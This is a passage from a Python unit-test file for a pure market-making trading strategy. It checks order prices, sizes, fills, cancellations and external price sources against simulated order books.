PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, pricing_delegate=self.multiple_order_strategy_pricing_delegate, sizing_delegate=self.staggered_strategy_sizing_delegate, order_refresh_time=45, logging_options=logging_options ) self.delayed_placement_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, pricing_delegate=self.constant_pricing_delegate, sizing_delegate=self.constant_sizing_delegate, order_refresh_time=900, filled_order_delay=80, logging_options=logging_options ) self.penny_jumping_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, 
pricing_delegate=self.constant_pricing_delegate, sizing_delegate=self.constant_sizing_delegate, order_optimization_enabled=True, order_refresh_time=900, filled_order_delay=80, hanging_orders_enabled=True, logging_options=logging_options ) self.ext_market: BacktestMarket = BacktestMarket() self.ext_data: MockOrderBookLoader = MockOrderBookLoader(*self.maker_trading_pairs) self.ext_market_info: MarketTradingPairTuple = MarketTradingPairTuple( self.ext_market, *self.maker_trading_pairs ) self.ext_data.set_balanced_order_book(mid_price=50, min_price=1, max_price=400, price_step_size=1, volume_step_size=10) self.ext_market.add_data(self.ext_data) self.asset_del = OrderBookAssetPriceDelegate(self.ext_market, self.maker_trading_pairs[0]) self.ext_exc_price_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filled_order_delay=self.order_refresh_time, filter_delegate=self.filter_delegate, sizing_delegate=self.constant_sizing_delegate, pricing_delegate=self.constant_pricing_delegate, order_refresh_time=45, logging_options=logging_options, asset_price_delegate=self.asset_del ) self.multi_orders_ext_exc_price_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filled_order_delay=self.order_refresh_time, filter_delegate=self.filter_delegate, sizing_delegate=self.equal_strategy_sizing_delegate, pricing_delegate=self.multiple_order_strategy_pricing_delegate, order_refresh_time=45, logging_options=logging_options, asset_price_delegate=self.asset_del ) ExchangeRateConversion.set_global_exchange_rate_config({ "global_config": { self.maker_trading_pairs[1]: {"default": 200, "source": "mock_data_feed"}, self.maker_trading_pairs[2]: {"default": 1, "source": "mock_data_feed"} }, "default_data_feed": "mock_data_feed" }) mock_feed = MockDataFeed("mock_data_feed", {self.maker_trading_pairs[1]: 200, self.maker_trading_pairs[2]: 1}) ExchangeRateConversion.set_data_feeds([ mock_feed ]) 
ExchangeRateConversion.set_update_interval(0.1) ExchangeRateConversion.get_instance().start() time.sleep(1) self.feed_asset_del = DataFeedAssetPriceDelegate(self.maker_trading_pairs[1], self.maker_trading_pairs[2]) self.ext_feed_price_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filled_order_delay=self.order_refresh_time, filter_delegate=self.filter_delegate, sizing_delegate=self.constant_sizing_delegate, pricing_delegate=self.constant_pricing_delegate, order_refresh_time=45, logging_options=logging_options, asset_price_delegate=self.feed_asset_del ) self.multi_orders_ext_feed_price_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filled_order_delay=self.order_refresh_time, filter_delegate=self.filter_delegate, sizing_delegate=self.equal_strategy_sizing_delegate, pricing_delegate=self.multiple_order_strategy_pricing_delegate, order_refresh_time=45, logging_options=logging_options, asset_price_delegate=self.feed_asset_del ) self.logging_options = logging_options self.clock.add_iterator(self.maker_market) self.clock.add_iterator(self.strategy) self.maker_order_fill_logger: EventLogger = EventLogger() self.cancel_order_logger: EventLogger = EventLogger() self.maker_market.add_listener(MarketEvent.OrderFilled, self.maker_order_fill_logger) self.maker_market.add_listener(MarketEvent.OrderCancelled, self.cancel_order_logger) def simulate_maker_market_trade(self, is_buy: bool, quantity: float): maker_trading_pair: str = self.maker_trading_pairs[0] order_book: OrderBook = self.maker_market.get_order_book(maker_trading_pair) trade_event: OrderBookTradeEvent = OrderBookTradeEvent( maker_trading_pair, self.clock.current_timestamp, TradeType.BUY if is_buy else TradeType.SELL, (self.mid_price * (1 - self.bid_threshold - 0.01) if not is_buy else self.mid_price * (1 + self.ask_threshold + 0.01)), quantity ) order_book.apply_trade(trade_event) # Update the orderbook so that the top bids and asks are 
lower than actual for a wider bid ask spread # this basially removes the orderbook entries above top bid and below top ask @staticmethod def simulate_order_book_widening(order_book: OrderBook, top_bid: float, top_ask: float): bid_diffs: List[OrderBookRow] = [] ask_diffs: List[OrderBookRow] = [] update_id: int = order_book.last_diff_uid + 1 for row in order_book.bid_entries(): if row.price > top_bid: bid_diffs.append(OrderBookRow(row.price, 0, update_id)) else: break for row in order_book.ask_entries(): if row.price < top_ask: ask_diffs.append(OrderBookRow(row.price, 0, update_id)) else: break order_book.apply_diffs(bid_diffs, ask_diffs, update_id) @staticmethod def simulate_limit_order_fill(market: Market, limit_order: LimitOrder): quote_currency_traded: Decimal = limit_order.price * limit_order.quantity base_currency_traded: Decimal = limit_order.quantity quote_currency: str = limit_order.quote_currency base_currency: str = limit_order.base_currency config: MarketConfig = market.config if limit_order.is_buy: market.set_balance(quote_currency, market.get_balance(quote_currency) - quote_currency_traded) market.set_balance(base_currency, market.get_balance(base_currency) + base_currency_traded) market.trigger_event(MarketEvent.OrderFilled, OrderFilledEvent( market.current_timestamp, limit_order.client_order_id, limit_order.trading_pair, TradeType.BUY, OrderType.LIMIT, limit_order.price, limit_order.quantity, TradeFee(Decimal("0.0")) )) market.trigger_event(MarketEvent.BuyOrderCompleted, BuyOrderCompletedEvent( market.current_timestamp, limit_order.client_order_id, base_currency, quote_currency, base_currency if config.buy_fees_asset is AssetType.BASE_CURRENCY else quote_currency, base_currency_traded, quote_currency_traded, Decimal("0.0"), OrderType.LIMIT )) else: market.set_balance(quote_currency, market.get_balance(quote_currency) + quote_currency_traded) market.set_balance(base_currency, market.get_balance(base_currency) - base_currency_traded) 
market.trigger_event(MarketEvent.OrderFilled, OrderFilledEvent( market.current_timestamp, limit_order.client_order_id, limit_order.trading_pair, TradeType.SELL, OrderType.LIMIT, limit_order.price, limit_order.quantity, TradeFee(Decimal("0.0")) )) market.trigger_event(MarketEvent.SellOrderCompleted, SellOrderCompletedEvent( market.current_timestamp, limit_order.client_order_id, base_currency, quote_currency, base_currency if config.sell_fees_asset is AssetType.BASE_CURRENCY else quote_currency, base_currency_traded, quote_currency_traded, Decimal("0.0"), OrderType.LIMIT )) def test_confirm_active_bids_asks(self): self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(1, len(self.strategy.active_bids)) self.assertEqual(1, len(self.strategy.active_asks)) def test_correct_price_correct_size(self): self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(self.mid_price * (1 + self.ask_threshold), self.strategy.active_asks[0][1].price) self.assertEqual(self.mid_price * (1 - self.bid_threshold), self.strategy.active_bids[0][1].price) self.assertEqual(1, self.strategy.active_bids[0][1].quantity) self.assertEqual(1, self.strategy.active_asks[0][1].quantity) def test_spread_configs_update_single_mode(self): self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(self.mid_price * (1 - Decimal('0.01')), self.strategy.active_bids[0][1].price) self.assertEqual(self.mid_price * (1 + Decimal('0.01')), self.strategy.active_asks[0][1].price) self.assertEqual(1, self.strategy.active_bids[0][1].quantity) self.assertEqual(1, self.strategy.active_asks[0][1].quantity) ConfigCommand.update_running_pure_mm(self.strategy, "bid_spread", Decimal('2')) ConfigCommand.update_running_pure_mm(self.strategy, "ask_spread", Decimal('3')) self.clock.backtest_til(self.start_timestamp + (2 * self.clock_tick_size) + 1) self.assertEqual(self.mid_price * (1 - Decimal('0.02')), self.strategy.active_bids[0][1].price) 
        self.assertEqual(self.mid_price * (1 + Decimal('0.03')), self.strategy.active_asks[0][1].price)

    def test_check_sufficient_balance(self):
        """Orders on a side are only placed when the corresponding asset balance is non-zero."""
        # No quote balance -> no bid can be placed; ask side unaffected.
        self.maker_market.set_balance("WETH", 0)
        end_ts = self.start_timestamp + self.clock_tick_size
        self.clock.backtest_til(end_ts)
        self.assertEqual(0, len(self.strategy.active_bids))
        self.assertEqual(1, len(self.strategy.active_asks))
        # No base balance either -> both sides empty.
        self.maker_market.set_balance("COINALPHA", 0)
        end_ts += self.clock_tick_size
        self.clock.backtest_til(end_ts)
        self.assertEqual(0, len(self.strategy.active_bids))
        self.assertEqual(0, len(self.strategy.active_asks))
        # Balances restored -> both sides place one order each.
        self.maker_market.set_balance("COINALPHA", 500)
        self.maker_market.set_balance("WETH", 500)
        end_ts += self.clock_tick_size
        self.clock.backtest_til(end_ts)
        self.assertEqual(1, len(self.strategy.active_bids))
        self.assertEqual(1, len(self.strategy.active_asks))

    def test_check_if_active_orders_are_cancelled_every_tick(self):
        """After a refresh tick the strategy holds new order objects, not the originals."""
        end_ts = self.start_timestamp + self.clock_tick_size
        self.clock.backtest_til(end_ts)
        old_bid = self.strategy.active_bids[0][1]
        old_ask = self.strategy.active_asks[0][1]
        self.assertEqual(1, len(self.strategy.active_bids))
        self.assertEqual(1, len(self.strategy.active_asks))
        end_ts += self.clock_tick_size + 1
        self.clock.backtest_til(end_ts)
        new_bid = self.strategy.active_bids[0][1]
        new_ask = self.strategy.active_asks[0][1]
        self.assertNotEqual(old_ask, new_ask)
        self.assertNotEqual(old_bid, new_bid)

    def test_order_fills(self):
        """A simulated taker buy fills the strategy's ask and emits one SELL fill event."""
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        self.assertEqual(1, len(self.strategy.active_bids))
        self.assertEqual(1, len(self.strategy.active_asks))
        bid_order: LimitOrder = self.strategy.active_bids[0][1]
        ask_order: LimitOrder = self.strategy.active_asks[0][1]
        self.assertEqual(Decimal("99"), bid_order.price)
        self.assertEqual(Decimal("101"), ask_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)
        self.simulate_maker_market_trade(True, 5.0)
        self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1)
        self.assertEqual(1, len(self.maker_order_fill_logger.event_log))
        maker_fill: OrderFilledEvent = self.maker_order_fill_logger.event_log[0]
        self.assertEqual(TradeType.SELL, maker_fill.trade_type)
        self.assertAlmostEqual(101, maker_fill.price)
        self.assertAlmostEqual(1.0, maker_fill.amount)
        self.maker_order_fill_logger.clear()

    def test_market_become_wider(self):
        """Widening the book does not move the constant-spread quotes (still 99 / 101)."""
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        bid_order: LimitOrder = self.strategy.active_bids[0][1]
        ask_order: LimitOrder = self.strategy.active_asks[0][1]
        self.assertEqual(Decimal("99"), bid_order.price)
        self.assertEqual(Decimal("101"), ask_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)
        self.simulate_order_book_widening(self.maker_data.order_book, 90, 110)
        self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1)
        # Both old orders are cancelled on refresh, then re-placed at the same prices.
        self.assertEqual(2, len(self.cancel_order_logger.event_log))
        self.assertEqual(1, len(self.strategy.active_bids))
        self.assertEqual(1, len(self.strategy.active_asks))
        bid_order: LimitOrder = self.strategy.active_bids[0][1]
        ask_order: LimitOrder = self.strategy.active_asks[0][1]
        self.assertEqual(Decimal("99"), bid_order.price)
        self.assertEqual(Decimal("101"), ask_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)

    def test_market_became_narrower(self):
        """Narrowing the book's top of book does not move the constant-spread quotes."""
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        bid_order: LimitOrder = self.strategy.active_bids[0][1]
        ask_order: LimitOrder = self.strategy.active_asks[0][1]
        self.assertEqual(Decimal("99"), bid_order.price)
        self.assertEqual(Decimal("101"), ask_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)
        # Insert tighter top-of-book levels at 99.5 / 100.5.
        self.maker_data.order_book.apply_diffs([OrderBookRow(99.5, 30, 2)], [OrderBookRow(100.5, 30, 2)], 2)
        self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1)
        self.assertEqual(1, len(self.strategy.active_bids))
        self.assertEqual(1, len(self.strategy.active_asks))
        bid_order = self.strategy.active_bids[0][1]
        ask_order = self.strategy.active_asks[0][1]
        self.assertEqual(Decimal("99"), bid_order.price)
        self.assertEqual(Decimal("101"), ask_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)

    def test_order_fills_after_cancellation(self):
        """Orders re-placed after the refresh cancellation can still be filled on both sides."""
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        bid_order: LimitOrder = self.strategy.active_bids[0][1]
        ask_order: LimitOrder = self.strategy.active_asks[0][1]
        self.assertEqual(Decimal("99"), bid_order.price)
        self.assertEqual(Decimal("101"), ask_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)
        self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1)
        self.assertEqual(2, len(self.cancel_order_logger.event_log))
        bid_order: LimitOrder = self.strategy.active_bids[0][1]
        ask_order: LimitOrder = self.strategy.active_asks[0][1]
        self.assertEqual(Decimal("99"), bid_order.price)
        self.assertEqual(Decimal("101"), ask_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)
        self.simulate_limit_order_fill(self.maker_market, bid_order)
        self.simulate_limit_order_fill(self.maker_market, ask_order)
        fill_events = self.maker_order_fill_logger.event_log
        self.assertEqual(2, len(fill_events))
        # A filled bid shows up as a SELL fill and a filled ask as a BUY fill (taker side).
        bid_fills: List[OrderFilledEvent] = [evt for evt in fill_events if evt.trade_type is TradeType.SELL]
        ask_fills: List[OrderFilledEvent] = [evt for evt in fill_events if evt.trade_type is TradeType.BUY]
        self.assertEqual(1, len(bid_fills))
        self.assertEqual(1, len(ask_fills))
        self.maker_order_fill_logger.clear()

    def test_strategy_after_user_cancels_orders(self):
        """Manually cancelled orders are removed and stay absent on the next tick."""
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        self.assertEqual(1, len(self.strategy.active_bids))
        self.assertEqual(1, len(self.strategy.active_asks))
        bid_order: LimitOrder = self.strategy.active_bids[0][1]
        ask_order: LimitOrder = self.strategy.active_asks[0][1]
        self.assertEqual(Decimal("99"), bid_order.price)
        self.assertEqual(Decimal("101"), ask_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)
        self.strategy.cancel_order(self.market_info, bid_order.client_order_id)
        self.strategy.cancel_order(self.market_info, ask_order.client_order_id)
        self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1)
        self.assertEqual(0, len(self.strategy.active_bids))
        self.assertEqual(0, len(self.strategy.active_asks))

    def test_strategy_with_transaction_costs(self):
        """With add_transaction_costs_to_orders=True and zero fees, quotes match the no-fee case."""
        self.clock.remove_iterator(self.strategy)
        logging_options: int = (PureMarketMakingStrategyV2.OPTION_LOG_ALL &
                                (~PureMarketMakingStrategyV2.OPTION_LOG_NULL_ORDER_SIZE))
        self.strategy_with_tx_costs: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2(
            [self.market_info],
            filled_order_delay=self.order_refresh_time,
            add_transaction_costs_to_orders=True,
            filter_delegate=self.filter_delegate,
            sizing_delegate=self.constant_sizing_delegate,
            pricing_delegate=self.constant_pricing_delegate,
            order_refresh_time=45,
            logging_options=logging_options
        )
        self.clock.add_iterator(self.strategy_with_tx_costs)
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        self.assertEqual(1, len(self.strategy_with_tx_costs.active_bids))
        self.assertEqual(1, len(self.strategy_with_tx_costs.active_asks))
        # Fees are zero here, check whether order placements are working
        bid_order: LimitOrder = self.strategy_with_tx_costs.active_bids[0][1]
        ask_order: LimitOrder = self.strategy_with_tx_costs.active_asks[0][1]
        self.assertEqual(Decimal("99"), bid_order.price)
        self.assertEqual(Decimal("101"), ask_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)
        # Check if orders are placed after order_refresh_time
        self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1)
        self.assertEqual(2, len(self.cancel_order_logger.event_log))
        bid_order: LimitOrder = self.strategy_with_tx_costs.active_bids[0][1]
        ask_order: LimitOrder = self.strategy_with_tx_costs.active_asks[0][1]
        self.assertEqual(Decimal("99"), bid_order.price)
        self.assertEqual(Decimal("101"), ask_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)
        # Check if order fills are working
        self.simulate_limit_order_fill(self.maker_market, bid_order)
        self.simulate_limit_order_fill(self.maker_market, ask_order)
        fill_events = self.maker_order_fill_logger.event_log
        self.assertEqual(2, len(fill_events))
        bid_fills: List[OrderFilledEvent] = [evt for evt in fill_events if evt.trade_type is TradeType.SELL]
        ask_fills: List[OrderFilledEvent] = [evt for evt in fill_events if evt.trade_type is TradeType.BUY]
        self.assertEqual(1, len(bid_fills))
        self.assertEqual(1, len(ask_fills))
        self.maker_order_fill_logger.clear()

    def test_external_exchange_price_source(self):
        """Quotes are derived from the external exchange price, not the local book."""
        self.clock.remove_iterator(self.strategy)
        self.clock.add_iterator(self.ext_exc_price_strategy)
        end_ts = self.start_timestamp + self.clock_tick_size
        self.clock.backtest_til(end_ts)
        self.assertEqual(1, len(self.ext_exc_price_strategy.active_bids))
        # There should be no sell order, since its price will be below first bid order on the order book.
        self.assertEqual(0, len(self.ext_exc_price_strategy.active_asks))
        # check price data from external exchange is used for order placement
        bid_order: LimitOrder = self.ext_exc_price_strategy.active_bids[0][1]
        self.assertEqual(Decimal("49.5"), bid_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)

    def test_external_exchange_price_source_empty_orderbook(self):
        """With an emptied local book, both external-priced orders can be placed."""
        self.simulate_order_book_widening(self.maker_data.order_book, 0, 10000)
        self.assertEqual(0, len(list(self.maker_data.order_book.bid_entries())))
        self.assertEqual(0, len(list(self.maker_data.order_book.ask_entries())))
        self.clock.remove_iterator(self.strategy)
        self.clock.add_iterator(self.ext_exc_price_strategy)
        end_ts = self.start_timestamp + self.clock_tick_size
        self.clock.backtest_til(end_ts)
        self.assertEqual(1, len(self.ext_exc_price_strategy.active_bids))
        self.assertEqual(1, len(self.ext_exc_price_strategy.active_asks))
        # check price data from external exchange is used for order placement
        bid_order: LimitOrder = self.ext_exc_price_strategy.active_bids[0][1]
        self.assertEqual(Decimal("49.5"), bid_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        ask_order: LimitOrder = self.ext_exc_price_strategy.active_asks[0][1]
        self.assertEqual(Decimal("50.5"), ask_order.price)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)

    def test_multi_order_external_exchange_price_source(self):
        """Multiple-level mode with an external price source: 5 bids ladder down 1% per level."""
        self.clock.remove_iterator(self.strategy)
        self.clock.add_iterator(self.multi_orders_ext_exc_price_strategy)
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        self.assertEqual(5, len(self.multi_orders_ext_exc_price_strategy.active_bids))
        self.assertEqual(0, len(self.multi_orders_ext_exc_price_strategy.active_asks))
        first_bid_order: LimitOrder = self.multi_orders_ext_exc_price_strategy.active_bids[0][1]
        self.assertEqual(Decimal("49.5"), first_bid_order.price)
        self.assertEqual(Decimal("1.0"), first_bid_order.quantity)
        last_bid_order: LimitOrder = self.multi_orders_ext_exc_price_strategy.active_bids[-1][1]
        # Fifth level: 1% step compounded four times below the first bid.
        last_bid_price = Decimal(49.5 * (1 - 0.01) ** 4).quantize(Decimal("0.001"))
        self.assertAlmostEqual(last_bid_price, last_bid_order.price, 3)
        self.assertEqual(Decimal("1.0"), last_bid_order.quantity)

    def test_multi_order_external_exchange_price_source_empty_order_book(self):
        """Same as above but with an emptied local book, so the ask ladder appears too."""
        self.simulate_order_book_widening(self.maker_data.order_book, 0, 10000)
        self.assertEqual(0, len(list(self.maker_data.order_book.bid_entries())))
        self.assertEqual(0, len(list(self.maker_data.order_book.ask_entries())))
        self.clock.remove_iterator(self.strategy)
        self.clock.add_iterator(self.multi_orders_ext_exc_price_strategy)
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        self.assertEqual(5, len(self.multi_orders_ext_exc_price_strategy.active_bids))
        self.assertEqual(5, len(self.multi_orders_ext_exc_price_strategy.active_asks))
        first_bid_order: LimitOrder = self.multi_orders_ext_exc_price_strategy.active_bids[0][1]
        self.assertEqual(Decimal("49.5"), first_bid_order.price)
        self.assertEqual(Decimal("1.0"), first_bid_order.quantity)
        first_ask_order: LimitOrder = self.multi_orders_ext_exc_price_strategy.active_asks[0][1]
        self.assertEqual(Decimal("50.5"), first_ask_order.price)
        self.assertEqual(Decimal("1.0"), first_ask_order.quantity)
        last_bid_order: LimitOrder = self.multi_orders_ext_exc_price_strategy.active_bids[-1][1]
        last_bid_price = Decimal(49.5 * (1 - 0.01) ** 4).quantize(Decimal("0.001"))
        self.assertAlmostEqual(last_bid_price, last_bid_order.price, 3)
        self.assertEqual(Decimal("1.0"), last_bid_order.quantity)
        last_ask_order: LimitOrder = self.multi_orders_ext_exc_price_strategy.active_asks[-1][1]
        last_ask_price = Decimal(50.5 * (1 + 0.01) ** 4).quantize(Decimal("0.001"))
        self.assertAlmostEqual(last_ask_price, last_ask_order.price, 3)
        self.assertEqual(Decimal("1.0"), last_ask_order.quantity)

    def test_external_feed_price_source(self):
        """Quotes are derived from an external data-feed price (202 ask only here)."""
        self.clock.remove_iterator(self.strategy)
        self.clock.add_iterator(self.ext_feed_price_strategy)
        end_ts = self.start_timestamp + self.clock_tick_size
        self.clock.backtest_til(end_ts)
        self.assertEqual(0, len(self.ext_feed_price_strategy.active_bids))
        self.assertEqual(1, len(self.ext_feed_price_strategy.active_asks))
        # check price data from external exchange is used for order placement
        ask_order: LimitOrder = self.ext_feed_price_strategy.active_asks[0][1]
        self.assertEqual(Decimal("202"), ask_order.price)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)

    def test_external_feed_price_source_empty_orderbook(self):
        """With an emptied local book, both feed-priced orders (198 / 202) can be placed."""
        self.simulate_order_book_widening(self.maker_data.order_book, 0, 10000)
        self.assertEqual(0, len(list(self.maker_data.order_book.bid_entries())))
        self.assertEqual(0, len(list(self.maker_data.order_book.ask_entries())))
        self.clock.remove_iterator(self.strategy)
        self.clock.add_iterator(self.ext_feed_price_strategy)
        end_ts = self.start_timestamp + self.clock_tick_size
        self.clock.backtest_til(end_ts)
        self.assertEqual(1, len(self.ext_feed_price_strategy.active_bids))
        self.assertEqual(1, len(self.ext_feed_price_strategy.active_asks))
        # check price data from external exchange is used for order placement
        bid_order: LimitOrder = self.ext_feed_price_strategy.active_bids[0][1]
        self.assertEqual(Decimal("198"), bid_order.price)
        self.assertEqual(Decimal("1.0"), bid_order.quantity)
        ask_order: LimitOrder = self.ext_feed_price_strategy.active_asks[0][1]
        self.assertEqual(Decimal("202"), ask_order.price)
        self.assertEqual(Decimal("1.0"), ask_order.quantity)

    def test_spread_configs_update_multiple_mode(self):
        """Live spread-config updates (via ConfigCommand) reprice the whole order ladder."""
        self.clock.remove_iterator(self.strategy)
        self.clock.add_iterator(self.multi_order_equal_strategy)
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        self.assertEqual(5, len(self.multi_order_equal_strategy.active_bids))
        self.assertEqual(5, len(self.multi_order_equal_strategy.active_asks))
        first_bid_order: LimitOrder = self.multi_order_equal_strategy.active_bids[0][1]
        first_ask_order: LimitOrder = self.multi_order_equal_strategy.active_asks[0][1]
        self.assertEqual(Decimal("99"), first_bid_order.price)
        self.assertEqual(Decimal("101"), first_ask_order.price)
        last_bid_order: LimitOrder = self.multi_order_equal_strategy.active_bids[-1][1]
        last_ask_order: LimitOrder = self.multi_order_equal_strategy.active_asks[-1][1]
        last_bid_price = Decimal(99 * (1 - 0.01) ** 4).quantize(Decimal("0.01"))
        last_ask_price = Decimal(101 * (1 + 0.01) ** 4).quantize(Decimal("0.01"))
        self.assertAlmostEqual(last_bid_price, last_bid_order.price, 2)
        self.assertAlmostEqual(last_ask_price, last_ask_order.price, 2)
        # Widen both spreads to 2% at runtime; ladder should re-anchor at 98 / 102.
        ConfigCommand.update_running_pure_mm(self.multi_order_equal_strategy, "bid_spread", Decimal('2'))
        ConfigCommand.update_running_pure_mm(self.multi_order_equal_strategy, "ask_spread", Decimal('2'))
        self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1)
        first_bid_order: LimitOrder = self.multi_order_equal_strategy.active_bids[0][1]
        first_ask_order: LimitOrder = self.multi_order_equal_strategy.active_asks[0][1]
        self.assertEqual(Decimal("98"), first_bid_order.price)
        self.assertEqual(Decimal("102"), first_ask_order.price)
        last_bid_order: LimitOrder = self.multi_order_equal_strategy.active_bids[-1][1]
        last_ask_order: LimitOrder = self.multi_order_equal_strategy.active_asks[-1][1]
        last_bid_price = Decimal(98 * (1 - 0.01) ** 4).quantize(Decimal("0.01"))
        last_ask_price = Decimal(102 * (1 + 0.01) ** 4).quantize(Decimal("0.01"))
        self.assertAlmostEqual(last_bid_price, last_bid_order.price, 2)
        self.assertAlmostEqual(last_ask_price, last_ask_order.price, 2)

    def test_multiple_orders_equal_sizes(self):
        """Equal-size multi-level mode: 5 levels per side, all quantity 1.0."""
        self.clock.remove_iterator(self.strategy)
        self.clock.add_iterator(self.multi_order_equal_strategy)
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        self.assertEqual(5, len(self.multi_order_equal_strategy.active_bids))
        self.assertEqual(5, len(self.multi_order_equal_strategy.active_asks))
        first_bid_order: LimitOrder = self.multi_order_equal_strategy.active_bids[0][1]
        first_ask_order: LimitOrder = self.multi_order_equal_strategy.active_asks[0][1]
        self.assertEqual(Decimal("99"), first_bid_order.price)
        self.assertEqual(Decimal("101"), first_ask_order.price)
        self.assertEqual(Decimal("1.0"), first_bid_order.quantity)
        self.assertEqual(Decimal("1.0"), first_ask_order.quantity)
        last_bid_order: LimitOrder = self.multi_order_equal_strategy.active_bids[-1][1]
        last_ask_order: LimitOrder = self.multi_order_equal_strategy.active_asks[-1][1]
        last_bid_price = Decimal(99 * (1 - 0.01) ** 4).quantize(Decimal("0.001"))
        last_ask_price = Decimal(101 * (1 + 0.01) ** 4).quantize(Decimal("0.001"))
        self.assertAlmostEqual(last_bid_price, last_bid_order.price, 3)
        self.assertAlmostEqual(last_ask_price, last_ask_order.price, 3)
        self.assertEqual(Decimal("1.0"), last_bid_order.quantity)
        self.assertEqual(Decimal("1.0"), last_ask_order.quantity)
        self.simulate_maker_market_trade(True, 5.0)
        self.assertEqual(5, len(self.multi_order_equal_strategy.active_bids))
        self.assertEqual(4, len(self.multi_order_equal_strategy.active_asks))
        self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1)
        self.assertEqual(1, len(self.maker_order_fill_logger.event_log))
        maker_fill: OrderFilledEvent = self.maker_order_fill_logger.event_log[0]
        self.assertEqual(TradeType.SELL, maker_fill.trade_type)
        self.assertAlmostEqual(101, maker_fill.price)
        self.assertAlmostEqual(1.0, maker_fill.amount)
        # NOTE(review): the lines below act on self.strategy, which was removed from the
        # clock at the top of this test (not on multi_order_equal_strategy), and the
        # second backtest_til targets the same timestamp as above (a no-op). Looks like a
        # copy-paste slip — verify intent before relying on these assertions.
        self.strategy.cancel_order(self.market_info, first_bid_order.client_order_id)
        self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1)
        self.assertEqual(0, len(self.strategy.active_bids))
        self.assertEqual(0, len(self.strategy.active_asks))

    def test_multiple_orders_staggered_sizes(self):
        """Staggered-size multi-level mode: sizes grow 0.5 per level (last level 3.0)."""
        self.clock.remove_iterator(self.strategy)
        self.clock.add_iterator(self.multi_order_staggered_strategy)
        self.clock.backtest_til(self.start_timestamp + self.clock_tick_size)
        self.assertEqual(5, len(self.multi_order_staggered_strategy.active_bids))
        self.assertEqual(5, len(self.multi_order_staggered_strategy.active_asks))
        first_bid_order: LimitOrder = self.multi_order_staggered_strategy.active_bids[0][1]
        first_ask_order: LimitOrder = self.multi_order_staggered_strategy.active_asks[0][1]
        self.assertEqual(Decimal("99"), first_bid_order.price)
        self.assertEqual(Decimal("101"), first_ask_order.price)
        self.assertEqual(Decimal("1.0"), first_bid_order.quantity)
        self.assertEqual(Decimal("1.0"), first_ask_order.quantity)
        last_bid_order: LimitOrder = self.multi_order_staggered_strategy.active_bids[-1][1]
        last_ask_order: LimitOrder = self.multi_order_staggered_strategy.active_asks[-1][1]
        last_bid_price = Decimal(99 * (1 - 0.01) ** 4).quantize(Decimal("0.001"))
        last_ask_price = Decimal(101 * (1 + 0.01) ** 4).quantize(Decimal("0.001"))
        last_bid_order_size = Decimal(1 + (0.5 * 4)).quantize(Decimal("0.001"))
        last_ask_order_size = Decimal(1 + (0.5 * 4)).quantize(Decimal("0.001"))
        self.assertAlmostEqual(last_bid_price, last_bid_order.price, 3)
        self.assertAlmostEqual(last_ask_price, last_ask_order.price, 3)
        self.assertAlmostEqual(last_bid_order_size, last_bid_order.quantity)
        self.assertAlmostEqual(last_ask_order_size, last_ask_order.quantity)
        self.simulate_maker_market_trade(True, 5.0)
        self.assertEqual(5, len(self.multi_order_staggered_strategy.active_bids))
        self.assertEqual(4, len(self.multi_order_staggered_strategy.active_asks))
